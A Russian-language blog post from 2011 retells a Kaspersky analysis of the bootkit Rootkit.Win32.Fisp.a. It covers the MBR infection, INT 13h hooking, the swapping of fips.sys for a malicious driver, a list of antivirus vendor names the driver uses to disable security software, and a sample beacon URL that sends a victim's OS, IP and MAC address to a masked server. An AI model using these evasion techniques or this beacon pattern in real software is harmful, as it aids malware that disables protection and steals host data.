Ай Ком Сервис Китайский след: Rookit.Win32.Fisp.a - 2 Апреля 2011 - Ай Ком Сервис
Главная » 2011 » Апрель » 2 » Китайский след: Rookit.Win32.Fisp.a
03:28
Китайский след: Rookit.Win32.Fisp.a
Недавно, экспертами из "Лаборатории Касперского" был обнаружен  новый буткит — зловред Rookit.Win32.Fisp.a, заражающий загрузочный сектор жесткого диска. Буткит- вредоносная программа, получающая управление до начала загрузки операционной системы посредством инфицирования главной загрузочной записи жесткого диска (MBR). Для распространения и внедрения буткита используется Trojan-Downloader.NSIS.Agent.jd. Этот зловред попадает на компьютеры пользователей, которые опрометчиво пытаются скачать видеоролик на фальшивом китайском порносайте. Загрузчик примечателен тем, что скачивает другие зловреды с помощью NSIS-движка, а все ссылки хранит в соответствующем NSIS-скрипте.


Фрагмент NSIS-скрипта зловреда Trojan-Downloader.NSIS.Agent.jd

В числе скачиваемых даунлоадером файлов на компьютер загружается  и дроппер Rootkit.Win32.Fisp.a. Этот зловред заражает загрузочный сектор жесткого диска. А именно – сохраняет старый MBR в третьем секторе, а свой записывает вместо него. Начиная с четвертого сектора, он располагает зашифрованный драйвер и остальной код.


Фрагмент начала жесткого диска, зараженного Rootkit.Win32.Fisp.a

После заражения компьютера при загрузке машины зловред сразу же получает управление. Первым делом, чтобы контролировать процесс загрузки Windows, он подменяет прерывание INT 13h с помощью изменения таблицы векторов прерываний. Затем буткит восстанавливает оригинальный MBR и возобновляет нормальный процесс загрузки. Когда определенная часть системы загружена, буткит перехватывает функцию ExVerifySuite. Установленная ловушка заменяет системный драйвер fips.sys на вредоносный драйвер, который в зашифрованном виде был записан в начале жесткого диска. Стоит отметить, что драйвер fips.sys не является обязательным для корректного функционирования ОС, поэтому система не «рушится» после его замены. Вредоносный драйвер перехватывает запускаемые процессы с помощью PsSetLoadImageNotifyRoutine. Ловушка обрабатывает в загружаемом образе PE-заголовок, просматривая в нем секцию Security массива DataDirectory. В драйвере содержится список строк, которые встречаются в процессах популярных антивирусов. Если в процессах встречается одна из таких строк, то драйвер модифицирует загружаемому образу точку входа, так что нормальное функционирование образа становится невозможным.

Beike
Beijing Rising Information Technology
AVG Technologies
Trend Micro
BITDEFENDER LLC
Symantec Corporation
Kaspersky Lab
ESET, spol
Beijing Jiangmin
Kingsoft Software
360.cn
Keniu Network Technology (Beijing) Co
Qizhi Software (beijing) Co,

А основной функционал драйвера – внедрение в процесс explorer.exe и загрузка другой версии Rootkit.Win32.Fisp.a с функционалом загрузчика. Вредоносная программа посылает серверу запрос с информацией об установленной операционной системе, IP-адресе, MAC-адресе и т.д.

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=none&g=none&k=a&h=62&i=2&j=0321-01

Пример запроса, отправляемого серверу

Впоследствии зловред скачивает на компьютер пользователя модификации Trojan-Dropper.Win32.Vedio.dgs и Trojan-GameThief.Win32.OnLineGames.boas.  Все описанное выше можно представить в виде следующей схемы:


На сегодняшний день, антивирусные решения «Лаборатории Касперского» успешно обнаруживают и обезвреживают угрозу Rootkit.Win32.Fisp.a.




Категория: Интернет угрозы | Просмотров: 1129 | Добавил: Administrator | Теги: Trojan-Dropper.Win32.Vedio.dgs, компьютерные вирусы, буткит, explorer.exe, Антивирусы, закгрузочная область, троян, руткит, Trojan-Downloader | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]